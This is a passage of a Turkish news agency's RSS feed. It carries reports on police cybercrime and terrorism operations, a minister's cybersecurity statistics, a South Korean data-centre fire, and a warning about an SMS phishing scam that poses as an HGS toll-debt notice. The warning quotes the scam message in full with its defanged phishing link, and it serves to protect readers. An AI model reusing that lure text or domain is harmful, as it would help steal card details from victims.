<p data-start="1156" data-end="1420"><strong data-start="1156" data-end="1181">30 Şüpheli Tutuklandı</strong><br data-start="1181" data-end="1184">Operasyonlarda yakalanan 32 şüpheliden <strong data-start="1223" data-end="1242">30’u tutuklandı</strong>, 2’si hakkında ise adli kontrol hükümleri uygulandı. Şüphelilerin “Suç işlemek amacıyla örgüt kurma” ve <strong data-start="1347" data-end="1380">7258 sayılı Kanun’a muhalefet</strong> suçlarından işlem gördüğü bildirildi.</p>
<p data-start="1422" data-end="1708"><strong data-start="1422" data-end="1479">Milyonluk Hesap Hareketleri ve Mal Varlığına El Koyma</strong><br data-start="1479" data-end="1482">“Suçtan kaynaklanan malvarlığı değerlerinin aklanması” kapsamında, şüphelilere ait <strong data-start="1565" data-end="1575">5 araç</strong> ve <strong data-start="1579" data-end="1601">410 banka hesabına</strong> el konuldu. Operasyonla bağlantılı hesaplarda 524,5 milyon TL’lik yasa dışı para hareketi tespit edildi.</p>
<p data-start="1710" data-end="1980"><strong data-start="1710" data-end="1763">Yasa Dışı Bahis Siteleri Üzerinden Dolandırıcılık</strong><br data-start="1763" data-end="1766">Yapılan incelemelerde, şüphelilerin internet siteleri üzerinden yasa dışı bahis oynattıkları, <strong data-start="1860" data-end="1905">reklam yoluyla haksız kazanç sağladıkları</strong> ve kullanıcı yönlendirmeleriyle vatandaşları dolandırdıkları belirlendi.</p>
<p data-start="1982" data-end="2309"><strong data-start="1982" data-end="2044">“Toplumun Geleceğini Tehdit Eden Suçlara Karşı Kararlıyız”</strong><br data-start="2044" data-end="2047">Bakan Yerlikaya, açıklamasında, “Yasa dışı bahis sadece bireylerin değil, toplumun geleceğini de tehdit eden bir suçtur. Vatandaşlarımızın güvenliği için yasa dışı bahis ve siber dolandırıcılıkla mücadelemize kararlılıkla devam ediyoruz.” ifadelerini kullandı.</p>
<p data-start="2311" data-end="2451"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Ali Yerlikaya: “Siber Suçlarla Mücadelede 17 İlde 189 Şüpheli Yakalandı”</title>
            <link>https://cumha.com.tr/ali-yerlikaya-siber-suclarla-mucadelede-17-ilde-189-supheli-yakalandi</link>
            <guid>https://cumha.com.tr/ali-yerlikaya-siber-suclarla-mucadelede-17-ilde-189-supheli-yakalandi</guid>
            <description><![CDATA[ İçişleri Bakanı Ali Yerlikaya, sosyal medya hesabından yaptığı açıklamada Siber Suçlarla Mücadele kapsamında 17 il merkezli gerçekleştirilen operasyonlarda 189 şüphelinin yakalandığını bildirdi. “Yasa dışı bahis, nitelikli dolandırıcılık, çevrim içi çocuk müstehcenliği ve tacizi” suçlarına yönelik yürütülen operasyonlarda 83 kişinin tutuklandığını, 47’si hakkında adli kontrol hükümlerinin uygulandığını belirten Yerlikaya, vatandaşları çevrim içi dolandırıcılıklara karşı dikkatli olmaya çağırdı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202510/image_870x_68fb307cd0bcc.webp" length="23216" type="image/webp"/>
            
            <pubDate>Fri, 24 Oct 2025 10:54:11 +0300</pubDate>
            <dc:creator>Sıla Akçaat</dc:creator>
            <media:keywords>ali yerlikaya siber suç operasyonu, yasa dışı bahis operasyonu 2025, çevrim içi dolandırıcılık soruşturması, egm masak koordinasyon operasyonu</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="616" data-end="619">İçişleri Bakanı <strong data-start="635" data-end="652">Ali Yerlikaya</strong>, sosyal medya platformu X üzerinden yaptığı paylaşımda, <strong data-start="709" data-end="810">“Siber Suçlarla Mücadele kapsamında 1 haftadır süren operasyonlarımızda 189 şüpheliyi yakaladık.”</strong> ifadelerini kullandı.</p>
<p></p>
<p data-start="836" data-end="1123"><strong data-start="836" data-end="871">17 İLDE EŞ ZAMANLI OPERASYONLAR</strong><br data-start="871" data-end="874">Yerlikaya, Adana, Adıyaman, Amasya, Bitlis, Düzce, Gaziantep, İstanbul, İzmir, Kayseri, Kocaeli, Nevşehir, Osmaniye, Sakarya, Sivas, Tekirdağ, Van ve Yalova merkezli gerçekleştirilen operasyonlarda çok sayıda kişinin gözaltına alındığını bildirdi.</p>
<p data-start="1125" data-end="1356"><strong data-start="1125" data-end="1169">83 KİŞİ TUTUKLANDI, 47’SİNE ADLİ KONTROL</strong><br data-start="1169" data-end="1172">Operasyonlarda 189 şüpheliden 83’ünün tutuklandığını, 47’si hakkında ise adli kontrol kararı verildiğini açıklayan Yerlikaya, diğer şüphelilerle ilgili işlemlerin sürdüğünü kaydetti.</p>
<p><img src="https://cumha.com.tr/uploads/images/202510/image_870x_68fb308941461.webp" alt=""></p>
<p data-start="1358" data-end="1788"><strong data-start="1358" data-end="1413">DOLANDIRICILIK VE MÜSTEHCENLİK SUÇLARINA SIKI TAKİP</strong><br data-start="1413" data-end="1416">Soruşturmalarda şüphelilerin “ürün satışı, kiralık bungalov, yatırım ortaklığı” gibi temalarla vatandaşları dolandırdıkları, çocuk müstehcenliği içeren görüntüler bulundurdukları ve yasa dışı bahis faaliyetlerinde bulunduklarının belirlendiği ifade edildi. Ayrıca, bazı kişilerin mobil bankacılık hesaplarına erişim sağlayarak haksız kazanç elde ettikleri tespit edildi.</p>
<p data-start="1790" data-end="2031"><strong data-start="1790" data-end="1833">EGM VE MASAK KOORDİNASYONUNDA YÜRÜTÜLDÜ</strong><br data-start="1833" data-end="1836">Operasyonların Emniyet Genel Müdürlüğü <strong data-start="1875" data-end="1919">Siber Suçlarla Mücadele Daire Başkanlığı</strong> ve <strong data-start="1923" data-end="1932">MASAK</strong> koordinasyonunda, İl Emniyet Müdürlüklerinin ilgili birimleri tarafından yürütüldüğü bildirildi.</p>
<p data-start="2033" data-end="2356"><strong data-start="2033" data-end="2067">“SİBER VATAN’DA DA PEŞİNDEYİZ”</strong><br data-start="2067" data-end="2070">Ali Yerlikaya paylaşımında, <strong data-start="2098" data-end="2225">“Vatandaşlarımızı dolandırmaya çalışanların Kara Vatan’da olduğu gibi Siber Vatan’da da sanal devriyelerimizle peşindeyiz.”</strong> ifadesini kullandı. Bakan Yerlikaya, şüpheli durumlarda vatandaşların 112 Acil Çağrı Merkezi’ni arayarak bilgi vermesini istedi.</p>
<p data-start="2358" data-end="2515"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Ulaştırma ve Altyapı Bakanı Abdulkadir Uraloğlu: “Türkiye, Küresel Siber Güvenlik Endeksinde 100 Tam Puanla Rol Model Ülke Kategorisinde”</title>
            <link>https://cumha.com.tr/ulastirma-ve-altyapi-bakani-abdulkadir-uraloglu-turkiye-kuresel-siber-guvenlik-endeksinde-100-tam-puanla-rol-model-ulke-kategorisinde</link>
            <guid>https://cumha.com.tr/ulastirma-ve-altyapi-bakani-abdulkadir-uraloglu-turkiye-kuresel-siber-guvenlik-endeksinde-100-tam-puanla-rol-model-ulke-kategorisinde</guid>
            <description><![CDATA[ Ulaştırma ve Altyapı Bakanı Abdulkadir Uraloğlu, 18. Uluslararası Bilgi Güvenliği ve Kriptoloji Konferansı’nda yaptığı konuşmada Türkiye’nin siber güvenlik alanında elde ettiği başarıları anlattı. Uraloğlu, Bilgi Teknolojileri ve İletişim Kurumu bünyesindeki Ulusal Siber Olaylara Müdahale Merkezinin (USOM), 14 sektörel SOME ve 2 bin 374 kurumsal SOME ile koordineli çalışarak ülkenin siber güvenlik kapasitesini güçlendirdiğini söyledi. Bakan, 2024 yılı Küresel Siber Güvenlik Endeksi’ne göre Türkiye’nin 100 tam puanla “Seviye 1: Rol Model Ülke” olarak tanımlandığını belirtti. Ayrıca, ekim ayı itibarıyla 74 bin 594 zararlı bağlantının erişime engellendiğini, yalnızca son bir haftada 502 bin 173 zararlı internet adresine 75,1 milyon erişim engeli uygulandığını açıkladı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202510/image_870x_68f9deea0fdd9.webp" length="59852" type="image/webp"/>
            
            <pubDate>Thu, 23 Oct 2025 10:53:38 +0300</pubDate>
            <dc:creator>Sıla Akçaat</dc:creator>
            <media:keywords>abdulkadir uraloğlu siber güvenlik açıklaması, usom zararlı bağlantı engelleme, türkiye küresel siber güvenlik endeksi, 5g ihalesi gelir miktarı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="958" data-end="961"><strong data-start="961" data-end="996">Siber Güvenlikte Türkiye Modeli</strong><br data-start="996" data-end="999">Ulaştırma ve Altyapı Bakanı <strong data-start="1027" data-end="1050">Abdulkadir Uraloğlu</strong>, Ankara’da düzenlenen <strong data-start="1073" data-end="1134">18. Uluslararası Bilgi Güvenliği ve Kriptoloji Konferansı</strong>’nda yaptığı konuşmada, dijitalleşmenin hız kazandığı günümüzde siber güvenliğin stratejik bir öncelik haline geldiğini söyledi. Uraloğlu, “Bilgi çağın en değerli hazinesi, siber güvenlik ise bu hazineyi koruyan en kritik kaledir.” dedi.</p>
<p></p>
<p data-start="1375" data-end="1774"><strong data-start="1375" data-end="1423">USOM, 2 Bin 374 Kurumla Koordineli Çalışıyor</strong><br data-start="1423" data-end="1426">Bakan Uraloğlu, Bilgi Teknolojileri ve İletişim Kurumu bünyesinde faaliyet gösteren <strong data-start="1510" data-end="1562">Ulusal Siber Olaylara Müdahale Merkezinin (USOM)</strong> 14 sektörel SOME ve 2 bin 374 kurumsal SOME ile koordineli biçimde çalıştığını belirtti. “USOM, 8 bin 237 uzman personel ile ülkemizin siber olaylara müdahale kapasitesini güçlendiriyor.” ifadelerini kullandı.</p>
<p data-start="1776" data-end="2216"><strong data-start="1776" data-end="1821">Zararlı Bağlantılara Karşı Etkin Mücadele</strong><br data-start="1821" data-end="1824">Uraloğlu, ekim ayı itibarıyla <strong data-start="1854" data-end="1911">74 bin 594 zararlı bağlantının erişime engellendiğini</strong> ve <strong data-start="1915" data-end="1970">306 güvenlik bildiriminin kurumlarla paylaşıldığını</strong> açıkladı. “Yapay zeka teknolojisi ile vatandaşlarımızı dolandırmaya yönelik 74 bin 205 oltalama alan adını tespit ederek erişime kapattık. Sadece son bir haftada 502 bin 173 zararlı internet adresine 75,1 milyon erişim engeli uyguladık.” dedi.</p>
<p><img src="https://cumha.com.tr/uploads/images/202510/image_870x_68f9dec12b8fa.webp" alt=""></p>
<p data-start="2218" data-end="2548"><strong data-start="2218" data-end="2260">Yerli Yazılımlar Güçlü Koruma Sağlıyor</strong><br data-start="2260" data-end="2263">USOM’un yerli ve milli yazılımları <strong data-start="2298" data-end="2339">“Avcı, Azad, Kasırga, Atmaca ve Kule”</strong> sayesinde 17 milyon IP adresinde düzenli zafiyet taraması yaptığını kaydeden Uraloğlu, “USOM, yalnızca 7 saatte yaklaşık 242 bin 133 kritik web sitesini zafiyetlere karşı tarayabiliyor.” ifadesini kullandı.</p>
<p data-start="2550" data-end="2947"><strong data-start="2550" data-end="2601">18 Ulusal Hedef ve 61 Eylem Maddesiyle İlerleme</strong><br data-start="2601" data-end="2604">Bakan Uraloğlu, <strong data-start="2620" data-end="2683">Ulusal Siber Güvenlik Stratejisi ve Eylem Planı (2024–2028)</strong> kapsamında 6 stratejik amaç belirlediklerini söyledi. “Siber dayanıklılık, proaktif savunma, caydırıcılık, insan odaklı güvenlik, yerli teknolojiler ve uluslararası marka hedefleri doğrultusunda 18 ulusal hedef ve 61 eylem maddesiyle ilerliyoruz.” diye konuştu.</p>
<p data-start="2949" data-end="3224"><strong data-start="2949" data-end="2995">5G İhalesi Dijital Dönüşümde Dönüm Noktası</strong><br data-start="2995" data-end="2998">Geçtiğimiz hafta tamamlanan <strong data-start="3026" data-end="3056">5G yetkilendirme ihalesine</strong> de değinen Uraloğlu, “İhalemiz 3 milyar 534 milyon dolarlık gelirle sonuçlandı. Bu başarı, iletişim altyapımıza ve Ar-Ge çalışmalarımıza ivme kazandıracaktır.” dedi.</p>
<p data-start="3226" data-end="3600"><strong data-start="3226" data-end="3267">Yeni Siber Güvenlik Kanunu Yürürlükte</strong><br data-start="3267" data-end="3270">Uraloğlu, <strong data-start="3280" data-end="3344">19 Mart 2025 tarihinde yürürlüğe giren Siber Güvenlik Kanunu</strong> ile Türkiye’nin siber uzaydaki ulusal çıkarlarını korumayı ve yerli-milli ekosistemi güçlendirmeyi hedeflediklerini belirtti. Ayrıca sosyal medya platformlarına yönelik yasal düzenlemelerin 5651 ve 7418 sayılı kanunlar çerçevesinde sürdüğünü hatırlattı.</p>
<p><img src="https://cumha.com.tr/uploads/images/202510/image_870x_68f9ded559219.webp" alt=""></p>
<p data-start="3602" data-end="3966"><strong data-start="3602" data-end="3649">Çocukların Dijital Güvenliği Öncelikli Konu</strong><br data-start="3649" data-end="3652">Bakan Uraloğlu, özellikle <strong data-start="3678" data-end="3720">çocukların sosyal medyada korunmasının</strong> Bakanlığın öncelikleri arasında olduğunu ifade etti. “Yapay zekâ teknolojilerinin etkisiyle çocuklar dezenformasyona daha fazla maruz kalıyor. Bu nedenle 16 yaş altı kullanıcılar için sosyal medya düzenlemesi hazırlıyoruz.” açıklamasını yaptı.</p>
<p data-start="3968" data-end="4316"><strong data-start="3968" data-end="3997">“Türkiye, Rol Model Ülke”</strong><br data-start="3997" data-end="4000">Konuşmasının sonunda Uraloğlu, Uluslararası Telekomünikasyon Birliği’nin 2024 Küresel Siber Güvenlik Endeksi sonuçlarına atıfta bulunarak, “Türkiye, 100 tam puanla Seviye 1: Rol Model Ülke kategorisinde yer alıyor. Bu başarı, siber güvenlik alanında istikrarlı politikaların sonucudur.” değerlendirmesinde bulundu.</p>
<p data-start="4318" data-end="4477"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Ali Yerlikaya: “50 İlde FETÖ’ye Yönelik Operasyonlarda 286 Şüpheli Yakalandı, 154’ü Tutuklandı”</title>
            <link>https://cumha.com.tr/ali-yerlikaya-50-ilde-fetoye-yoenelik-operasyonlarda-286-supheli-yakalandi-154u-tutuklandi</link>
            <guid>https://cumha.com.tr/ali-yerlikaya-50-ilde-fetoye-yoenelik-operasyonlarda-286-supheli-yakalandi-154u-tutuklandi</guid>
            <description><![CDATA[ İçişleri Bakanı Ali Yerlikaya, son bir ayda 50 ilde düzenlenen FETÖ operasyonlarında 286 şüphelinin yakalandığını açıkladı. Tutuklanan 154 kişinin yanı sıra 79 kişi hakkında adli kontrol kararı verildi. Operasyonların Cumhuriyet Başsavcılıkları koordinasyonunda, Emniyet Genel Müdürlüğü TEM, KOM ve İstihbarat birimleri iş birliğiyle yürütüldüğü belirtildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202510/image_870x_68f7759e82879.webp" length="31338" type="image/webp"/>
            
            <pubDate>Tue, 21 Oct 2025 15:03:30 +0300</pubDate>
            <dc:creator>Sıla Akçaat</dc:creator>
            <media:keywords>fetö operasyonu 50 il, ali yerlikaya fetö açıklaması, bylock kullanıcıları operasyonu, tem ve kom eşgüdümlü operasyonlar</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="497" data-end="500">İçişleri Bakanı <strong data-start="516" data-end="533">Ali Yerlikaya</strong>, sosyal medya hesabından yaptığı açıklamada, Türkiye genelinde FETÖ’ye yönelik yürütülen operasyonlara ilişkin son bilgileri paylaştı. Yerlikaya, 50 ilde gerçekleştirilen çalışmalarda <strong data-start="718" data-end="750">286 şüphelinin yakalandığını</strong>, bunlardan <strong data-start="762" data-end="789">154’ünün tutuklandığını</strong>, <strong data-start="791" data-end="845">79’u hakkında adli kontrol hükümleri uygulandığını</strong> bildirdi.</p>
<p></p>
<p data-start="859" data-end="1208"><strong data-start="859" data-end="926">“Cumhuriyet Başsavcılıkları Koordinesinde Operasyonlar Sürüyor”</strong><br data-start="926" data-end="929">Yerlikaya, operasyonların <strong data-start="955" data-end="1064">Cumhuriyet Başsavcılıkları, Emniyet Genel Müdürlüğü TEM Daire Başkanlığı, KOM ve İstihbarat Başkanlıkları</strong> koordinasyonunda sürdürüldüğünü belirtti. İl Emniyet Müdürlüklerine bağlı TEM ve KOM Şube Müdürlüklerinin yoğun çalışma yürüttüğü kaydedildi.</p>
<p data-start="1210" data-end="1745"><strong data-start="1210" data-end="1245">50 İlde Eş Zamanlı Operasyonlar</strong><br data-start="1245" data-end="1248">Operasyonların <strong data-start="1263" data-end="1702">Adana, Afyonkarahisar, Aksaray, Ankara, Antalya, Aydın, Batman, Bingöl, Bursa, Çanakkale, Çorum, Denizli, Düzce, Edirne, Elazığ, Erzurum, Eskişehir, Gaziantep, Giresun, Gümüşhane, Hatay, Isparta, İstanbul, İzmir, Kahramanmaraş, Kars, Kayseri, Kırıkkale, Kocaeli, Konya, Kütahya, Malatya, Manisa, Mardin, Mersin, Muğla, Muş, Nevşehir, Niğde, Ordu, Osmaniye, Rize, Sakarya, Samsun, Sivas, Şanlıurfa, Tekirdağ, Tokat, Trabzon ve Zonguldak</strong> illerinde gerçekleştirildiği bildirildi.</p>
<p><img src="https://cumha.com.tr/uploads/images/202510/image_870x_68f77591c5e32.webp" alt=""></p>
<p data-start="1747" data-end="2139"><strong data-start="1747" data-end="1788">“FETÖ’nün Güncel Yapılanmasına Darbe”</strong><br data-start="1788" data-end="1791">Bakan Yerlikaya’nın açıklamasına göre, yakalanan şüphelilerin <strong data-start="1853" data-end="1932">terör örgütünün güncel, finans, askeri mahrem ve sivil mahrem yapılanmaları</strong> içinde faaliyet yürüttükleri tespit edildi. Şüphelilerin, örgütün kriptolu haberleşme programı <strong data-start="2028" data-end="2038">ByLock</strong>’u kullandıkları ve <strong data-start="2058" data-end="2125">ankesörlü telefonlar aracılığıyla örgüt içi iletişim kurdukları</strong> belirlendi.</p>
<p data-start="2141" data-end="2427"><strong data-start="2141" data-end="2184">Kesinleşmiş Cezası Olanlar da Yakalandı</strong><br data-start="2184" data-end="2187">Operasyonlarda ayrıca, FETÖ soruşturmaları kapsamında hakkında <strong data-start="2250" data-end="2278">kesinleşmiş hapis cezası</strong> ve <strong data-start="2282" data-end="2298">aranma kaydı</strong> bulunan kişilerin de yakalandığı ifade edildi. Bakan Yerlikaya, terörle mücadelede kararlılıkla hareket ettiklerini vurguladı.</p>
<p data-start="2429" data-end="2564"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>HGS borcu uyarısı kılığında yaygın SMS dolandırıcılığı: 795 TL’lik mobil ödeme linkiyle kişisel veriler hedef alınıyor</title>
            <link>https://cumha.com.tr/hgs-borcu-uyarisi-kiliginda-yaygin-sms-dolandiriciligi-795-tllik-mobil-oedeme-linkiyle-kisisel-veriler-hedef-aliniyor</link>
            <guid>https://cumha.com.tr/hgs-borcu-uyarisi-kiliginda-yaygin-sms-dolandiriciligi-795-tllik-mobil-oedeme-linkiyle-kisisel-veriler-hedef-aliniyor</guid>
            <description><![CDATA[ HGS borcu olduğu iddiasıyla gönderilen ve 14 Ekim 2025 tarihine kadar 795 TL ödenmesini isteyen sahte SMS’ler vatandaşlara ulaşıyor. Mesajdaki kısa bağlantı mobil cihazlarda açılan sahte bir siteye yönlendiriyor; site önce kullanıcıdan cep telefonu numarası talep ediyor, ardından kart bilgileri istenen bir ödeme formu gösteriyor. Siber güvenlik araştırmacısı ve haberci Ebubekir Bastama bu tespiti Ulusal Siber Olaylara Müdahale Merkezi’ne (USOM) bildirdi. Uzmanlar, linke tıklanmamasını, numaranın engellenmesini ve olgunun resmi kurumlara bildirilmesini öneriyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202510/image_870x_68ed482567cf8.webp" length="39156" type="image/webp"/>
            
            <pubDate>Mon, 13 Oct 2025 21:42:56 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Bu SMS gerçek mi, linke tıklarsam ne olur, nasıl korunabilirim, kime şikayet etmeliyim</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="792" data-end="1124">Trafik geçiş ücreti bildirimi kılığında gönderilen SMS’lerde araç sahibine 795,00 TL ödenmemiş HGS borcu olduğu belirtiliyor. Mesajda 13 Ekim 2025 son ödeme tarihi gösterilerek aciliyet algısı oluşturuluyor. Mesaj içindeki kısa bağlantıya tıklayan kullanıcılar mobil cihazlarda açılan sahte bir siteye yönlendiriliyor.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202510/image_870x_68ed16e6a1c9b.webp" alt=""></p>
<p data-start="1126" data-end="1672">SMS’teki kısa bağlantıya tıklayan kullanıcı önce mobil tarayıcıda açılan sahte sayfaya yönlendiriliyor. Sayfa kullanıcıdan öncelikle cep telefonu numarasını girmesini istiyor. Telefon numarası girildikten sonra resimde görülen ödeme bölümü açılıyor; burada karttaki isim, kart numarası, son kullanma tarihi ve CVV kodu gibi bilgiler talep ediliyor. Sayfa, resmi kurum tasarımını andıran öğeler (örneğin KGM benzeri logo, “Elektronik geçiş ücretini çevrimiçi ödeyin” başlığı) kullanarak güven yaratmaya çalışıyor.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202510/image_870x_68ed16d601ead.webp" alt=""></p>
<p data-start="1674" data-end="1964"><br data-start="1693" data-end="1696">Siber güvenlik araştırmacısı ve haberci Ebubekir Bastama, yapılan incelemede sitenin yalnızca mobil cihazlarda açıldığını ve ilk aşamada telefon numarası istendiğini tespit ettiğini bildirdi. Bastama bulgularını Ulusal Siber Olaylara Müdahale Merkezi’ne (USOM) iletti.</p>
<p data-start="1966" data-end="2237">Bu Sahte SMS Bastama tarafından eğitim verdiği bir vatandaş tarafından bildirilmesi ile tespit edilmiştir. Mesajda son ödeme tarihi 14 Ekim 2025 olarak gösteriliyor; gönderimler son günlere bırakılarak kullanıcıların acele etmesi amaçlanıyor. Benzer dolandırıcılık girişimleri yıl içinde farklı tarihlerle tekrar edilebiliyor.Site önce telefon numarası, sonra banka kartı bilgilerini talep ettiği için kullanıcı hakkında daha fazla sosyal mühendislik verisi toplanabiliyor. Kart bilgileri girildiğinde dolandırıcılar ödeme bilgilerini ele geçirip kötüye kullanabilir; ayrıca cihazlara zararlı yazılım yüklenme riski de bulunuyor.</p>
<p data-start="1966" data-end="2237">SMS metni örneği şu şekilde bulunuyor:<br data-start="2889" data-end="2892">"Değerli Araç Sahibi, Sistem kayıtlarına göre, HGS bakiyeniz yetersiz olduğundan aracınızın Otoyol geçiş ücreti ödenmemiştir. Cezalı duruma düşmemeniz için, lütfen 14 Ekim 2025 tarihine kadar ödemenizi tamamlayınız. Ödenmemiş Tutar: 795,00 TL Ödeme Bağlantısı: https:[//]kgminfo[.]cc/gv?qr=3urgOi"<br data-start="3186" data-end="3189">Bağlantıya tıklayan mobil tarayıcıda ilk aşamada telefon numarası isteniyor; ardından kart bilgileri girilen sahte ödeme formu gösteriliyor. Site mobilde çalışacak şekilde tasarlandığı için masaüstünde kolayca gözden kaçabiliyor.</p>
<p data-start="3420" data-end="3565">Resmi kurum isimleriyle gelen ancak doğrulanamayan mesajlara itibar edilmemeli. Uzmanlar şu adımları öneriyor:</p>
<ul data-start="3566" data-end="4052">
<li data-start="3566" data-end="3632">
<p data-start="3568" data-end="3632">Gelen bağlantıya kesinlikle tıklanmaması ve mesajın silinmesi.</p>
</li>
<li data-start="3633" data-end="3701">
<p data-start="3635" data-end="3701">Gönderen numaranın engellenmesi ve mobil operatöre bildirilmesi.</p>
</li>
<li data-start="3702" data-end="3801">
<p data-start="3704" data-end="3801">Telefon numarası ve kart bilgisi girildiyse bankaya derhal başvurarak kartın bloke ettirilmesi.</p>
</li>
</ul>
<p data-start="4054" data-end="4537"><br data-start="4073" data-end="4076">Resmi kurumlar genellikle ödeme taleplerini SMS içindeki kısa bağlantılar aracılığıyla doğrudan talep etmez. Vatandaşların e-Devlet, banka mobil uygulamaları veya kurumların resmi internet siteleri üzerinden doğrulama yapması gerekiyor. Kısa URL’ler ve bilinmeyen alan adları içeren mesajlara dikkat edilmeli; SMS’teki link yerine kurumların resmi iletişim kanalları kullanılmalı. Mobil uygulama izinleri ve tarayıcı yönlendirmeleri konusunda temkinli olunmalı.</p>
<p data-start="4539" data-end="4627"></p>
<p></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Güney Kore Devlet Veri Merkezi Yangını: 858 TB kalıcı veri kaybı, 709 kamu sistemi etkilendi</title>
            <link>https://cumha.com.tr/guney-kore-devlet-veri-merkezi-yangini-858-tb-kalici-veri-kaybi-709-kamu-sistemi-etkilendi</link>
            <guid>https://cumha.com.tr/guney-kore-devlet-veri-merkezi-yangini-858-tb-kalici-veri-kaybi-709-kamu-sistemi-etkilendi</guid>
            <description><![CDATA[ 26 Eylül 2025’te Güney Kore’nin Daejeon kentindeki Ulusal Bilgi Kaynakları Servisi (NIRS) veri merkezinde çıkan yangın, ülkenin G-Drive bulut sistemini tamamen yok etti. 858 terabayt devlet verisi geri döndürülemez biçimde silinirken, 709 kamu sistemi durdu. 10 Ekim itibarıyla yalnızca %30,6’sı yeniden devreye alınabildi. İlk bulgulara göre yangın, lityum-iyon bataryada yaşanan arıza sonucu başladı; olayda yedekleme eksikliği ağır biçimde eleştirildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202510/image_870x_68ea7a659a668.webp" length="100914" type="image/webp"/>
            
            <pubDate>Sat, 11 Oct 2025 18:47:05 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>858 TB veri kaybının nedeni neydi, kamu hizmetleri hangi oranda etkilendi, G-Drive sisteminde neden yedek bulunmadı, soruşturma hangi teknik bulgulara odaklanıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p>Güney Kore’nin Daejeon kentinde bulunan Ulusal Bilgi Kaynakları Servisi’ne (NIRS) ait devlet veri merkezinde 26 Eylül 2025 akşamı meydana gelen yangın, ülkenin dijital altyapısında ciddi kesintilere yol açtı. Yaklaşık 22 saat süren yangında “G-Drive” adlı ulusal bulut sistemi tamamen yok olurken, 858 terabaytlık devlet verisi kalıcı biçimde kaybedildi.</p>
<p data-start="965" data-end="1192">İlk tespitlere göre olay, enerji depolama alanındaki lityum-iyon bataryalarda yaşanan arıza sonucu başladı. Yetkililer 384 batarya paketinin yanarak imha olduğunu, “termal kaçak” nedeniyle yangının hızla yayıldığını bildirdi.</p>
<p data-start="1194" data-end="1512"><strong data-start="1194" data-end="1224">709 kamu hizmeti etkilendi</strong><br data-start="1224" data-end="1227">Yangın sonrası 709 çevrimiçi kamu hizmeti geçici olarak durdu. Bunlar arasında kimlik doğrulama, dilekçe başvuruları, posta sistemleri ve idari modüller yer aldı. İlk günlerde yalnızca %10’u yeniden çalıştırılabildi. 10 Ekim 2025 itibarıyla 217 sistem (%30,6) yeniden devreye alındı.</p>
<p data-start="1514" data-end="1834"><strong data-start="1514" data-end="1561">Yedekleme eksikliği krizin boyutunu artırdı</strong><br data-start="1561" data-end="1564">Kayıpların büyük kısmı, G-Drive sisteminin harici yedekleme altyapısına sahip olmamasından kaynaklandı. Korea Joongang Daily’ye göre, sistem düşük öncelikli sınıflandırıldığı için harici yedekleme yatırımı yapılmamıştı. Bu nedenle verilerin kurtarılması mümkün olmadı.</p>
<p data-start="1836" data-end="2104"><strong data-start="1836" data-end="1883">Soruşturma pil kaynaklı senaryoya odaklandı</strong><br data-start="1883" data-end="1886">Polis ve teknik ekipler, yangının lityum-iyon bataryalardan kaynaklandığını doğrulamak için incelemelerini sürdürüyor. Batarya odalarındaki ısı sensörleri, enerji kesme sistemleri ve taşıma süreci üzerinde duruluyor.</p>
<p data-start="2106" data-end="2421"><strong data-start="2106" data-end="2143">Resmî tepkiler ve alınan önlemler</strong><br data-start="2143" data-end="2146">Cumhurbaşkanı Lee Jae-myung olayın ardından veri merkezini ziyaret ederek yedeklilik standartlarının güçlendirilmesi talimatını verdi. Kriz yönetim merkezi, hizmetlerin aşamalı olarak yeniden devreye alınacağını ve ikili (dual) sistem planlamasının başlatıldığını açıkladı.</p>
<p data-start="2423" data-end="2767"><strong data-start="2423" data-end="2463">Uzmanlara göre olay ders niteliğinde</strong><br data-start="2463" data-end="2466">Uzmanlar, “bulut sistemlerin fiziksel risklerden muaf olmadığı” vurgusunu yaptı. Çok bölgeli mimarilerin ve düzenli yedekleme testlerinin zorunlu hale getirilmesi gerektiği ifade edildi. Ayrıca, enerji depolama odalarında lityum-iyon bataryaların güvenlik protokollerinin gözden geçirilmesi istendi.</p>
<p data-start="2769" data-end="2791"><strong data-start="2769" data-end="2789">Zaman çizelgesi:</strong></p>
<ul data-start="2792" data-end="3037">
<li data-start="2792" data-end="2861">
<p data-start="2794" data-end="2861"><strong data-start="2794" data-end="2812">26 Eylül 2025:</strong> Yangın 20.15 civarında başladı, hızla yayıldı.</p>
</li>
<li data-start="2862" data-end="2914">
<p data-start="2864" data-end="2914"><strong data-start="2864" data-end="2882">27 Eylül 2025:</strong> Yangın kontrol altına alındı.</p>
</li>
<li data-start="2915" data-end="2983">
<p data-start="2917" data-end="2983"><strong data-start="2917" data-end="2933">1 Ekim 2025:</strong> G-Drive verilerinin kurtarılamadığı kesinleşti.</p>
</li>
<li data-start="2984" data-end="3037">
<p data-start="2986" data-end="3037"><strong data-start="2986" data-end="3003">10 Ekim 2025:</strong> Kurtarma oranı %30,6’ya ulaştı.</p>
</li>
</ul>
